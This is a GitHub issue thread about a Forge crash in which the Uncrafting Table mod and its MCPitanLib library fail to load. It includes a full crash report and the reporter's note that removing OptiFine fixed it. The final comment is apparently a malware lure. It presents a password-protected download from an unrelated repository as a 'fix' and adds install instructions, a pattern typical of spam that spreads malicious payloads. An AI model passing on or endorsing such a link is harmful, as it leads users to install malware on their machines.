### ISSUE TITLE
Game crashing from these two mods.

### ISSUE THREAD

**Issue by Fimpfy** [Pitan76/UncraftingTable#74]
---- Minecraft Crash Report ----
// I bet Cylons wouldn't have this problem.

Time: 2024-08-28 19:34:27
Description: Mod loading error has occurred

java.lang.Exception: Mod Loading has failed
	at net.minecraftforge.logging.CrashReportExtender.dumpModLoadingCrashReport(CrashReportExtender.java:60) ~[forge-1.20.1-47.3.0-universal.jar%23241!/:?] {re:classloading}
	at net.minecraftforge.client.loading.ClientModLoader.completeModLoading(ClientModLoader.java:138) ~[forge-1.20.1-47.3.0-universal.jar%23241!/:?] {re:classloading,pl:runtimedistcleaner:A}
	at net.minecraft.client.Minecraft.lambda$new$4(Minecraft.java:571) ~[client-1.20.1-20230612.114412-srg.jar%23236!/:?] {re:mixin,pl:accesstransformer:B,pl:runtimedistcleaner:A,re:classloading,pl:accesstransformer:B,pl:mixin:A,pl:runtimedistcleaner:A}
	at net.minecraft.Util.m_137521_(Util.java:583) ~[client-1.20.1-20230612.114412-srg.jar%23236!/:?] {re:classloading,xf:OptiFine:default}
	at net.minecraft.client.Minecraft.lambda$new$5(Minecraft.java:564) ~[client-1.20.1-20230612.114412-srg.jar%23236!/:?] {re:mixin,pl:accesstransformer:B,pl:runtimedistcleaner:A,re:classloading,pl:accesstransformer:B,pl:mixin:A,pl:runtimedistcleaner:A}
	at net.minecraftforge.client.loading.ForgeLoadingOverlay.m_88315_(ForgeLoadingOverlay.java:146) ~[forge-1.20.1-47.3.0-universal.jar%23241!/:?] {re:classloading}
	at net.minecraft.client.renderer.GameRenderer.m_109093_(GameRenderer.java:1380) ~[client-1.20.1-20230612.114412-srg.jar%23236!/:?] {re:mixin,pl:accesstransformer:B,xf:OptiFine:default,re:classloading,pl:accesstransformer:B,xf:OptiFine:default,pl:mixin:APP:moonlight-common.mixins.json:GameRendererMixin,pl:mixin:APP:zeta_forge.mixins.json:client.GameRenderMixin,pl:mixin:A}
	at net.minecraft.client.Minecraft.m_91383_(Minecraft.java:1146) ~[client-1.20.1-20230612.114412-srg.jar%23236!/:?] {re:mixin,pl:accesstransformer:B,pl:runtimedistcleaner:A,re:classloading,pl:accesstransformer:B,pl:mixin:A,pl:runtimedistcleaner:A}
	at net.minecraft.client.Minecraft.m_91374_(Minecraft.java:718) ~[client-1.20.1-20230612.114412-srg.jar%23236!/:?] {re:mixin,pl:accesstransformer:B,pl:runtimedistcleaner:A,re:classloading,pl:accesstransformer:B,pl:mixin:A,pl:runtimedistcleaner:A}
	at net.minecraft.client.main.Main.main(Main.java:218) ~[forge-47.3.0.jar:?] {re:classloading,pl:runtimedistcleaner:A}
	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[?:?] {}
	at jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) ~[?:?] {}
	at jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[?:?] {}
	at java.lang.reflect.Method.invoke(Method.java:568) ~[?:?] {}
	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.runTarget(CommonLaunchHandler.java:111) ~[fmlloader-1.20.1-47.3.0.jar:?] {}
	at net.minecraftforge.fml.loading.targets.CommonLaunchHandler.clientService(CommonLaunchHandler.java:99) ~[fmlloader-1.20.1-47.3.0.jar:?] {}
	at net.minecraftforge.fml.loading.targets.CommonClientLaunchHandler.lambda$makeService$0(CommonClientLaunchHandler.java:25) ~[fmlloader-1.20.1-47.3.0.jar:?] {}
	at cpw.mods.modlauncher.LaunchServiceHandlerDecorator.launch(LaunchServiceHandlerDecorator.java:30) ~[modlauncher-10.0.9.jar:?] {}
	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:53) ~[modlauncher-10.0.9.jar:?] {}
	at cpw.mods.modlauncher.LaunchServiceHandler.launch(LaunchServiceHandler.java:71) ~[modlauncher-10.0.9.jar:?] {}
	at cpw.mods.modlauncher.Launcher.run(Launcher.java:108) ~[modlauncher-10.0.9.jar:?] {}
	at cpw.mods.modlauncher.Launcher.main(Launcher.java:78) ~[modlauncher-10.0.9.jar:?] {}
	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:26) ~[modlauncher-10.0.9.jar:?] {}
	at cpw.mods.modlauncher.BootstrapLaunchConsumer.accept(BootstrapLaunchConsumer.java:23) ~[modlauncher-10.0.9.jar:?] {}
	at cpw.mods.bootstraplauncher.BootstrapLauncher.main(BootstrapLauncher.java:141) ~[bootstraplauncher-1.1.2.jar:?] {}

A detailed walkthrough of the error, its code path and all known details is as follows:
---------------------------------------------------------------------------------------

-- Head --
Thread: Render thread
Suspected Mod: 
	Architectury (architectury), Version: 9.2.14
		Issue tracker URL: https://github.com/shedaniel/architectury/issues
		at TRANSFORMER/architectury@9.2.14/dev.architectury.registry.registries.forge.RegistrarManagerImpl$RegistryProviderImpl.lambda$new$0(RegistrarManagerImpl.java:127)
Stacktrace:
	at dev.architectury.registry.registries.forge.RegistrarManagerImpl$RegistryProviderImpl.lambda$new$0(RegistrarManagerImpl.java:127) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
-- MOD uncraftingtable76 --
Details:
	Caused by 0: java.lang.ExceptionInInitializerError
		at net.pitan76.mcpitanlib.api.registry.CompatRegistry.registerBlock(CompatRegistry.java:81) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
		at net.pitan76.uncraftingtable.UncraftingTable.init(UncraftingTable.java:36) ~[UncraftingTable-forge-1.3.6.jar%23234!/:?] {re:classloading}
		at net.pitan76.uncraftingtable.forge.UncraftingTableForge.<init>(UncraftingTableForge.java:21) ~[UncraftingTable-forge-1.3.6.jar%23234!/:?] {re:classloading}
		at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) ~[?:?] {}
		at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:77) ~[?:?] {}
		at jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45) ~[?:?] {}
		at java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:499) ~[?:?] {}
		at java.lang.reflect.Constructor.newInstance(Constructor.java:480) ~[?:?] {}
		at net.minecraftforge.fml.javafmlmod.FMLModContainer.constructMod(FMLModContainer.java:70) ~[javafmllanguage-1.20.1-47.3.0.jar%23238!/:?] {}
		at net.minecraftforge.fml.ModContainer.lambda$buildTransitionHandler$4(ModContainer.java:124) ~[fmlcore-1.20.1-47.3.0.jar%23237!/:?] {}
		at java.util.concurrent.CompletableFuture$AsyncRun.run(CompletableFuture.java:1804) ~[?:?] {}
		at java.util.concurrent.CompletableFuture$AsyncRun.exec(CompletableFuture.java:1796) ~[?:?] {}
		at java.util.concurrent.ForkJoinTask.doExec(ForkJoinTask.java:373) ~[?:?] {}
		at java.util.concurrent.ForkJoinPool$WorkQueue.topLevelExec(ForkJoinPool.java:1182) ~[?:?] {}
		at java.util.concurrent.ForkJoinPool.scan(ForkJoinPool.java:1655) ~[?:?] {re:computing_frames}
		at java.util.concurrent.ForkJoinPool.runWorker(ForkJoinPool.java:1622) ~[?:?] {re:computing_frames}
		at java.util.concurrent.ForkJoinWorkerThread.run(ForkJoinWorkerThread.java:165) ~[?:?] {}

	Mod File: /C:/Users/dhage/curseforge/minecraft/Instances/Fimpfy's Autumn Pack/mods/UncraftingTable-forge-1.3.6.jar
	Failure message: Uncrafting Table (uncraftingtable76) has failed to load correctly
		java.lang.ExceptionInInitializerError: null
	Mod Version: 1.3.6
	Mod Issue URL: https://github.com/PTOM76/uncraftingtable/issues
	Exception message: java.lang.IllegalStateException: Can't get event bus for mod 'mcpitanlib' because it was not registered!
Stacktrace:
	at dev.architectury.registry.registries.forge.RegistrarManagerImpl$RegistryProviderImpl.lambda$new$0(RegistrarManagerImpl.java:127) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
	at java.util.Optional.orElseThrow(Optional.java:403) ~[?:?] {re:mixin}
	at dev.architectury.registry.registries.forge.RegistrarManagerImpl$RegistryProviderImpl.lambda$new$1(RegistrarManagerImpl.java:127) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
	at com.google.common.base.Suppliers$NonSerializableMemoizingSupplier.get(Suppliers.java:183) ~[guava-31.1-jre.jar%23109!/:?] {}
	at dev.architectury.registry.registries.forge.RegistrarManagerImpl$RegistryProviderImpl.updateEventBus(RegistrarManagerImpl.java:136) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
	at dev.architectury.registry.registries.forge.RegistrarManagerImpl$RegistryProviderImpl.get(RegistrarManagerImpl.java:142) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
	at dev.architectury.registry.registries.RegistrarManager.get(RegistrarManager.java:52) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
	at net.pitan76.mcpitanlib.core.registry.MCPLRegistry.<init>(MCPLRegistry.java:37) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
	at net.pitan76.mcpitanlib.api.registry.CompatRegistry.<init>(CompatRegistry.java:44) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
	at net.pitan76.mcpitanlib.api.registry.CompatRegistry.createRegistry(CompatRegistry.java:55) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
	at net.pitan76.mcpitanlib.MCPitanLib.<clinit>(MCPitanLib.java:28) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
	at net.pitan76.mcpitanlib.api.registry.CompatRegistry.registerBlock(CompatRegistry.java:81) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
	at net.pitan76.uncraftingtable.UncraftingTable.init(UncraftingTable.java:36) ~[UncraftingTable-forge-1.3.6.jar%23234!/:?] {re:classloading}
	at net.pitan76.uncraftingtable.forge.UncraftingTableForge.<init>(UncraftingTableForge.java:21) ~[UncraftingTable-forge-1.3.6.jar%23234!/:?] {re:classloading}
	at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) ~[?:?] {}
	at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:77) ~[?:?] {}
	at jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45) ~[?:?] {}
	at java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:499) ~[?:?] {}
	at java.lang.reflect.Constructor.newInstance(Constructor.java:480) ~[?:?] {}
	at net.minecraftforge.fml.javafmlmod.FMLModContainer.constructMod(FMLModContainer.java:70) ~[javafmllanguage-1.20.1-47.3.0.jar%23238!/:?] {}
	at net.minecraftforge.fml.ModContainer.lambda$buildTransitionHandler$4(ModContainer.java:124) ~[fmlcore-1.20.1-47.3.0.jar%23237!/:?] {}
	at java.util.concurrent.CompletableFuture$AsyncRun.run(CompletableFuture.java:1804) ~[?:?] {}
	at java.util.concurrent.CompletableFuture$AsyncRun.exec(CompletableFuture.java:1796) ~[?:?] {}
	at java.util.concurrent.ForkJoinTask.doExec(ForkJoinTask.java:373) ~[?:?] {}
	at java.util.concurrent.ForkJoinPool$WorkQueue.topLevelExec(ForkJoinPool.java:1182) ~[?:?] {}
	at java.util.concurrent.ForkJoinPool.scan(ForkJoinPool.java:1655) ~[?:?] {re:computing_frames}
	at java.util.concurrent.ForkJoinPool.runWorker(ForkJoinPool.java:1622) ~[?:?] {re:computing_frames}
	at java.util.concurrent.ForkJoinWorkerThread.run(ForkJoinWorkerThread.java:165) ~[?:?] {}

-- MOD mcpitanlib --
Details:
	Caused by 0: java.lang.NoClassDefFoundError: Could not initialize class net.pitan76.mcpitanlib.MCPitanLib
		at net.pitan76.mcpitanlib.forge.MCPitanLibForge.<init>(MCPitanLibForge.java:12) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
		at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) ~[?:?] {}
		at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:77) ~[?:?] {}
		at jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45) ~[?:?] {}
		at java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:499) ~[?:?] {}
		at java.lang.reflect.Constructor.newInstance(Constructor.java:480) ~[?:?] {}
		at net.minecraftforge.fml.javafmlmod.FMLModContainer.constructMod(FMLModContainer.java:70) ~[javafmllanguage-1.20.1-47.3.0.jar%23238!/:?] {}
		at net.minecraftforge.fml.ModContainer.lambda$buildTransitionHandler$4(ModContainer.java:124) ~[fmlcore-1.20.1-47.3.0.jar%23237!/:?] {}
		at java.util.concurrent.CompletableFuture$AsyncRun.run(CompletableFuture.java:1804) ~[?:?] {}
		at java.util.concurrent.CompletableFuture$AsyncRun.exec(CompletableFuture.java:1796) ~[?:?] {}
		at java.util.concurrent.ForkJoinTask.doExec(ForkJoinTask.java:373) ~[?:?] {}
		at java.util.concurrent.ForkJoinPool$WorkQueue.topLevelExec(ForkJoinPool.java:1182) ~[?:?] {}
		at java.util.concurrent.ForkJoinPool.scan(ForkJoinPool.java:1655) ~[?:?] {re:computing_frames}
		at java.util.concurrent.ForkJoinPool.runWorker(ForkJoinPool.java:1622) ~[?:?] {re:computing_frames}
		at java.util.concurrent.ForkJoinWorkerThread.run(ForkJoinWorkerThread.java:165) ~[?:?] {}

	Mod File: /C:/Users/dhage/curseforge/minecraft/Instances/Fimpfy's Autumn Pack/mods/mcpitanlib-2.3.3-1.20.1-forge.jar
	Failure message: MCPitanLib (mcpitanlib) has failed to load correctly
		java.lang.NoClassDefFoundError: Could not initialize class net.pitan76.mcpitanlib.MCPitanLib
	Mod Version: 2.3.3-1.20.1-forge
	Mod Issue URL: https://github.com/Pitan76/MCPitanLib/issue
	Exception message: java.lang.ExceptionInInitializerError: Exception java.lang.IllegalStateException: Can't get event bus for mod 'mcpitanlib' because it was not registered! [in thread "modloading-worker-0"]
Stacktrace:
	at dev.architectury.registry.registries.forge.RegistrarManagerImpl$RegistryProviderImpl.lambda$new$0(RegistrarManagerImpl.java:127) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
	at java.util.Optional.orElseThrow(Optional.java:403) ~[?:?] {re:mixin}
	at dev.architectury.registry.registries.forge.RegistrarManagerImpl$RegistryProviderImpl.lambda$new$1(RegistrarManagerImpl.java:127) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
	at com.google.common.base.Suppliers$NonSerializableMemoizingSupplier.get(Suppliers.java:183) ~[guava-31.1-jre.jar%23109!/:?] {}
	at dev.architectury.registry.registries.forge.RegistrarManagerImpl$RegistryProviderImpl.updateEventBus(RegistrarManagerImpl.java:136) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
	at dev.architectury.registry.registries.forge.RegistrarManagerImpl$RegistryProviderImpl.get(RegistrarManagerImpl.java:142) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
	at dev.architectury.registry.registries.RegistrarManager.get(RegistrarManager.java:52) ~[architectury-9.2.14-forge.jar%23200!/:?] {re:classloading}
	at net.pitan76.mcpitanlib.core.registry.MCPLRegistry.<init>(MCPLRegistry.java:37) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
	at net.pitan76.mcpitanlib.api.registry.CompatRegistry.<init>(CompatRegistry.java:44) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
	at net.pitan76.mcpitanlib.api.registry.CompatRegistry.createRegistry(CompatRegistry.java:55) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
	at net.pitan76.mcpitanlib.MCPitanLib.<clinit>(MCPitanLib.java:28) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
	at net.pitan76.mcpitanlib.api.registry.CompatRegistry.registerBlock(CompatRegistry.java:81) ~[mcpitanlib-2.3.3-1.20.1-forge.jar%23219!/:?] {re:classloading}
	at net.pitan76.uncraftingtable.UncraftingTable.init(UncraftingTable.java:36) ~[UncraftingTable-forge-1.3.6.jar%23234!/:?] {re:classloading}
	at net.pitan76.uncraftingtable.forge.UncraftingTableForge.<init>(UncraftingTableForge.java:21) ~[UncraftingTable-forge-1.3.6.jar%23234!/:?] {re:classloading}
	at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method) ~[?:?] {}
	at jdk.internal.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:77) ~[?:?] {}
	at jdk.internal.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45) ~[?:?] {}
	at java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:499) ~[?:?] {}
	at java.lang.reflect.Constructor.newInstance(Constructor.java:480) ~[?:?] {}
	at net.minecraftforge.fml.javafmlmod.FMLModContainer.constructMod(FMLModContainer.java:70) ~[javafmllanguage-1.20.1-47.3.0.jar%23238!/:?] {}
	at net.minecraftforge.fml.ModContainer.lambda$buildTransitionHandler$4(ModContainer.java:124) ~[fmlcore-1.20.1-47.3.0.jar%23237!/:?] {}
	at java.util.concurrent.CompletableFuture$AsyncRun.run(CompletableFuture.java:1804) ~[?:?] {}
	at java.util.concurrent.CompletableFuture$AsyncRun.exec(CompletableFuture.java:1796) ~[?:?] {}
	at java.util.concurrent.ForkJoinTask.doExec(ForkJoinTask.java:373) ~[?:?] {}
	at java.util.concurrent.ForkJoinPool$WorkQueue.topLevelExec(ForkJoinPool.java:1182) ~[?:?] {}
	at java.util.concurrent.ForkJoinPool.scan(ForkJoinPool.java:1655) ~[?:?] {re:computing_frames}
	at java.util.concurrent.ForkJoinPool.runWorker(ForkJoinPool.java:1622) ~[?:?] {re:computing_frames}
	at java.util.concurrent.ForkJoinWorkerThread.run(ForkJoinWorkerThread.java:165) ~[?:?] {}

-- System Details --
Details:
	Minecraft Version: 1.20.1
	Minecraft Version ID: 1.20.1
	Operating System: Windows 10 (amd64) version 10.0
	Java Version: 17.0.8, Microsoft
	Java VM Version: OpenJDK 64-Bit Server VM (mixed mode), Microsoft
	Memory: 420579840 bytes (401 MiB) / 1090519040 bytes (1040 MiB) up to 6744440832 bytes (6432 MiB)
	CPUs: 12
	Processor Vendor: GenuineIntel
	Processor Name: Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz
	Identifier: Intel64 Family 6 Model 165 Stepping 5
	Microarchitecture: unknown
	Frequency (GHz): 2.90
	Number of physical packages: 1
	Number of physical CPUs: 6
	Number of logical CPUs: 12
	Graphics card #0 name: NVIDIA GeForce RTX 3060 Ti
	Graphics card #0 vendor: NVIDIA (0x10de)
	Graphics card #0 VRAM (MB): 4095.00
	Graphics card #0 deviceId: 0x2489
	Graphics card #0 versionInfo: DriverVersion=31.0.15.5123
	Memory slot #0 capacity (MB): 8192.00
	Memory slot #0 clockSpeed (GHz): 2.40
	Memory slot #0 type: DDR4
	Memory slot #1 capacity (MB): 8192.00
	Memory slot #1 clockSpeed (GHz): 2.40
	Memory slot #1 type: DDR4
	Virtual memory max (MB): 20464.23
	Virtual memory used (MB): 13670.12
	Swap memory total (MB): 4210.93
	Swap memory used (MB): 178.39
	JVM Flags: 4 total; -XX:HeapDumpPath=MojangTricksIntelDriversForPerformance_javaw.exe_minecraft.exe.heapdump -Xss1M -Xmx6432m -Xms256m
	OptiFine Version: OptiFine_1.20.1_HD_U_I6
	OptiFine Build: 20231221-120401
	Render Distance Chunks: 18
	Mipmaps: 4
	Anisotropic Filtering: 1
	Antialiasing: 0
	Multitexture: false
	Shaders: Bliss_v2.0.4_(Chocapic13_Shaders_edit).zip
	OpenGlVersion: 4.6.0 NVIDIA 551.23
	OpenGlRenderer: NVIDIA GeForce RTX 3060 Ti/PCIe/SSE2
	OpenGlVendor: NVIDIA Corporation
	CpuCount: 12
	ModLauncher: 10.0.9+10.0.9+main.dcd20f30
	ModLauncher launch target: forgeclient
	ModLauncher naming: srg
	ModLauncher services: 
		mixin-0.8.5.jar mixin PLUGINSERVICE 
		eventbus-6.0.5.jar eventbus PLUGINSERVICE 
		fmlloader-1.20.1-47.3.0.jar slf4jfixer PLUGINSERVICE 
		fmlloader-1.20.1-47.3.0.jar object_holder_definalize PLUGINSERVICE 
		fmlloader-1.20.1-47.3.0.jar runtime_enum_extender PLUGINSERVICE 
		fmlloader-1.20.1-47.3.0.jar capability_token_subclass PLUGINSERVICE 
		accesstransformers-8.0.4.jar accesstransformer PLUGINSERVICE 
		fmlloader-1.20.1-47.3.0.jar runtimedistcleaner PLUGINSERVICE 
		modlauncher-10.0.9.jar mixin TRANSFORMATIONSERVICE 
		modlauncher-10.0.9.jar OptiFine TRANSFORMATIONSERVICE 
		modlauncher-10.0.9.jar fml TRANSFORMATIONSERVICE 
	FML Language Providers: 
		minecraft@1.0
		lowcodefml@null
		javafml@null
	Mod List: 
		client-1.20.1-20230612.114412-srg.jar             |Minecraft                     |minecraft                     |1.20.1              |COMMON_SET|Manifest: a1:d4:5e:04:4f:d3:d6:e0:7b:37:97:cf:77:b0:de:ad:4a:47:ce:8c:96:49:5f:0a:cf:8c:ae:b2:6d:4b:8a:3f
		FarmersDelight-1.20.1-1.2.4.jar                   |Farmer's Delight              |farmersdelight                |1.20.1-1.2.4        |COMMON_SET|Manifest: NOSIGNATURE
		TreeChop-1.20.1-forge-0.19.0-fixed.jar            |HT's TreeChop                 |treechop                      |0.19.0              |COMMON_SET|Manifest: NOSIGNATURE
		insects_recrafted_152.jar                         |Insects: Recrafted            |insects_recrafted             |1.5.2               |COMMON_SET|Manifest: NOSIGNATURE
		moonlight-1.20-2.12.17-forge.jar                  |Moonlight Library             |moonlight                     |1.20-2.12.17        |COMMON_SET|Manifest: NOSIGNATURE
		nightlights-1.20.1-1.1.jar                        |Night Lights                  |nightlights                   |1.1                 |COMMON_SET|Manifest: NOSIGNATURE
		compact-storage-1.20.1-forge-6.0.1.70.jar         |CompactStorage                |compact_storage               |6.0.1.70            |COMMON_SET|Manifest: NOSIGNATURE
		amwplushies-forge-1.20.1-4.2.0.jar                |A Man With Plushies           |a_man_with_plushies           |4.2.0               |COMMON_SET|Manifest: NOSIGNATURE
		jei-1.20.1-forge-15.12.2.51.jar                   |Just Enough Items             |jei                           |15.12.2.51          |COMMON_SET|Manifest: NOSIGNATURE
		spectrelib-forge-0.13.15+1.20.1.jar               |SpectreLib                    |spectrelib                    |0.13.15+1.20.1      |COMMON_SET|Manifest: NOSIGNATURE
		supermartijn642corelib-1.1.17a-forge-mc1.20.1.jar |SuperMartijn642's Core Lib    |supermartijn642corelib        |1.1.17+a            |COMMON_SET|Manifest: NOSIGNATURE
		portablemobs-1.2.0-forge-mc1.20.jar               |Portable Mobs                 |portablemobs                  |1.2.0               |COMMON_SET|Manifest: NOSIGNATURE
		mcw-windows-2.3.0-mc1.20.1forge.jar               |Macaw's Windows               |mcwwindows                    |2.3.0               |COMMON_SET|Manifest: NOSIGNATURE
		decorative_lgbt_wall_flags_122.jar                |Decorative LGBT Wall Flags    |decorative_lgbt_wall_flags    |1.2.2               |COMMON_SET|Manifest: NOSIGNATURE
		decoration-delight-1.20.1.jar                     |Decoration Delight            |decoration_delight            |1.0.0               |COMMON_SET|Manifest: NOSIGNATURE
		JRFTL-1.20.1-1.6.0.jar                            |JRFTL                         |jrftl                         |1.6.0               |COMMON_SET|Manifest: NOSIGNATURE
		polymorph-forge-0.49.5+1.20.1.jar                 |Polymorph                     |polymorph                     |0.49.5+1.20.1       |COMMON_SET|Manifest: NOSIGNATURE
		extracarpets-1.1.jar                              |Extra Carpets                 |extracarpets                  |1.1                 |COMMON_SET|Manifest: NOSIGNATURE
		citadel-2.6.0-1.20.1.jar                          |Citadel                       |citadel                       |2.6.0               |COMMON_SET|Manifest: NOSIGNATURE
		alexsmobs-1.22.8.jar                              |Alex's Mobs                   |alexsmobs                     |1.22.8              |COMMON_SET|Manifest: NOSIGNATURE
		Rats-1.20.1-8.1.2.jar                             |Rats                          |rats                          |1.20.1-8.1.2        |COMMON_SET|Manifest: NOSIGNATURE
		NaturesCompass-1.20.1-1.11.2-forge.jar            |Nature's Compass              |naturescompass                |1.20.1-1.11.2-forge |COMMON_SET|Manifest: NOSIGNATURE
		backpacked-forge-1.20.1-2.2.5.jar                 |Backpacked                    |backpacked                    |2.2.5               |COMMON_SET|Manifest: 0d:78:5f:44:c0:47:0c:8c:e2:63:a3:04:43:d4:12:7d:b0:7c:35:37:dc:40:b1:c1:98:ec:51:eb:3b:3c:45:99
		mixinextras-forge-0.3.6.jar                       |MixinExtras                   |mixinextras                   |0.3.6               |COMMON_SET|Manifest: NOSIGNATURE
		MOAdecor HOLIDAYS 1.20.1.jar                      |MOA DECOR: HOLIDAYS           |moa_decor_holidays            |1.20.1              |COMMON_SET|Manifest: NOSIGNATURE
		refurbished_furniture-forge-1.20.1-1.0.6.jar      |MrCrayfish's Furniture Mod: Re|refurbished_furniture         |1.0.6               |COMMON_SET|Manifest: 0d:78:5f:44:c0:47:0c:8c:e2:63:a3:04:43:d4:12:7d:b0:7c:35:37:dc:40:b1:c1:98:ec:51:eb:3b:3c:45:99
		blueprint-1.20.1-7.1.0.jar                        |Blueprint                     |blueprint                     |7.1.0               |COMMON_SET|Manifest: NOSIGNATURE
		buzzier_bees-1.20.1-6.0.0.jar                     |Buzzier Bees                  |buzzier_bees                  |6.0.0               |COMMON_SET|Manifest: NOSIGNATURE
		autumnity-1.20.1-5.0.1.jar                        |Autumnity                     |autumnity                     |5.0.1               |COMMON_SET|Manifest: NOSIGNATURE
		carryon-forge-1.20.1-2.1.2.7.jar                  |Carry On                      |carryon                       |2.1.2.7             |COMMON_SET|Manifest: NOSIGNATURE
		framework-forge-1.20.1-0.7.6.jar                  |Framework                     |framework                     |0.7.6               |COMMON_SET|Manifest: 0d:78:5f:44:c0:47:0c:8c:e2:63:a3:04:43:d4:12:7d:b0:7c:35:37:dc:40:b1:c1:98:ec:51:eb:3b:3c:45:99
		hauntedharvest-1.20-3.1.20.jar                    |Haunted Harvest               |hauntedharvest                |1.20-3.1.20         |COMMON_SET|Manifest: NOSIGNATURE
		backpackedpatch-0.1-1.20.1.jar                    |Backpacked Patch              |backpackedpatch               |1.20.1              |COMMON_SET|Manifest: NOSIGNATURE
		cloth-config-forge-11.1.118.jar                   |Cloth Config v10 API          |cloth_config                  |11.1.118            |COMMON_SET|Manifest: NOSIGNATURE
		forge-1.20.1-47.3.0-universal.jar                 |Forge                         |forge                         |47.3.0              |COMMON_SET|Manifest: 84:ce:76:e8:45:35:e4:0e:63:86:df:47:59:80:0f:67:6c:c1:5f:6e:5f:4d:b3:54:47:1a:9f:7f:ed:5e:f2:90
		commonality-1.20.1-7.0.0.jar                      |Commonality                   |commonality                   |7.0.0               |COMMON_SET|Manifest: NOSIGNATURE
		Zeta-1.0-24.jar                                   |Zeta                          |zeta                          |1.0-24              |COMMON_SET|Manifest: NOSIGNATURE
		Quark-4.0-460.jar                                 |Quark                         |quark                         |4.0-460             |COMMON_SET|Manifest: NOSIGNATURE
		appleskin-forge-mc1.20.1-2.5.1.jar                |AppleSkin                     |appleskin                     |2.5.1+mc1.20.1      |COMMON_SET|Manifest: NOSIGNATURE
		apexcore-1.20.1-10.0.0.jar                        |ApexCore                      |apexcore                      |10.0.0              |COMMON_SET|Manifest: NOSIGNATURE
		fantasyfurniture-1.20.1-9.0.0.jar                 |Fantasy's Furniture           |fantasyfurniture              |9.0.0               |COMMON_SET|Manifest: NOSIGNATURE
		quark_delight_1.0.0_forge_1.20.1.jar              |Quark Delight                 |quarkdelight                  |1.0.0               |COMMON_SET|Manifest: NOSIGNATURE
		MOAdecor ELECTRONICS 1.20.1.A.jar                 |MOA: ELECTRONICS              |moa_decor_electronics         |1.20.1.             |COMMON_SET|Manifest: NOSIGNATURE
		UncraftingTable-forge-1.3.6.jar                   |Uncrafting Table              |uncraftingtable76             |1.3.6               |ERROR     |Manifest: NOSIGNATURE
		architectury-9.2.14-forge.jar                     |Architectury                  |architectury                  |9.2.14              |COMMON_SET|Manifest: NOSIGNATURE
		mcpitanlib-2.3.3-1.20.1-forge.jar                 |MCPitanLib                    |mcpitanlib                    |2.3.3-1.20.1-forge  |ERROR     |Manifest: NOSIGNATURE
	Crash Report UUID: 37a55ce5-cefb-438e-a313-9683c0cf4cf8
	FML: 47.3
	Forge: net.minecraftforge:47.3.0

**Comment by Fimpfy** [comment]
I removed optifine and it works now!

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
